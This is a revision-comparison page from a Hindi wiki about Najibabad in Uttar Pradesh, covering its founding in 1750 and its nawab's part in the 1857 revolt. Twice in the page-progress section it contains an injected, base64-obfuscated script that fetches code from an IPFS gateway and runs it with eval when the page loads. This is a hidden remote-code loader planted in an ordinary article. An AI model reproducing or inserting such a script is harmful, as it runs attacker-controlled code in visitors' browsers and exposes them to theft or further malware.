Difference between revisions of "नज़ीबाबाद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 2: Line 2:
 
*इस नगर को [[मुग़ल]] सम्राट-[[अहमदशाह बहादुर|अहमदशाह]] के समकालीन नवाब [[नज़ीबुद्दौला]] ने 1750 ई. में बसाया था।  
 
*इस नगर को [[मुग़ल]] सम्राट-[[अहमदशाह बहादुर|अहमदशाह]] के समकालीन नवाब [[नज़ीबुद्दौला]] ने 1750 ई. में बसाया था।  
 
*यह [[मालन नदी]] (प्राचीन मालिनी) से कुछ दूर पर गढ़वाल की तराई में स्थित है।  
 
*यह [[मालन नदी]] (प्राचीन मालिनी) से कुछ दूर पर गढ़वाल की तराई में स्थित है।  
*नज़ीबुद्दौला एक सफल कूटनीतिज्ञ था और [[मुग़ल साम्राज्य]] की तत्कालीन राजनीति में इसका काफ़ी दख़ल था। इसका मक़बरा नज़ीबाबाद में स्थित है।  
+
*नज़ीबुद्दौला एक सफल कूटनीतिज्ञ था और [[मुग़ल काल|मुग़ल साम्राज्य]] की तत्कालीन राजनीति में इसका काफ़ी दख़ल था। इसका मक़बरा नज़ीबाबाद में स्थित है।  
*1857 के विद्रोह में नज़ीबुद्दौला के उत्तराधिकारी नवाब [[दुंदू खाँ]] ने [[अंग्रेज|अंग्रेजों]] के विरुद्ध बग़ावत की थी, जिसके कारण उसकी रियासत ज़ब्त कर ली गई और उसका एक भाग रामपुर रियासत को दे दिया गया।  
+
*[[1857]] के विद्रोह में नज़ीबुद्दौला के उत्तराधिकारी नवाब [[दुंदू खाँ]] ने [[अंग्रेज|अंग्रेजों]] के विरुद्ध बग़ावत की थी, जिसके कारण उसकी रियासत ज़ब्त कर ली गई और उसका एक भाग रामपुर रियासत को दे दिया गया।  
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 06:45, 17 January 2011

  • nazibabad uttar pradesh ke bijanaur zile mean sthit hai.
  • is nagar ko mugal samrat-ahamadashah ke samakalin navab nazibuddaula ne 1750 ee. mean basaya tha.
  • yah malan nadi (prachin malini) se kuchh door par gadhaval ki taraee mean sthit hai.
  • nazibuddaula ek saphal kootanitijn tha aur mugal samrajy ki tatkalin rajaniti mean isaka kafi dakhal tha. isaka maqabara nazibabad mean sthit hai.
  • 1857 ke vidroh mean nazibuddaula ke uttaradhikari navab duandoo khaan ne aangrejoan ke viruddh bagavat ki thi, jisake karan usaki riyasat zabt kar li gee aur usaka ek bhag ramapur riyasat ko de diya gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh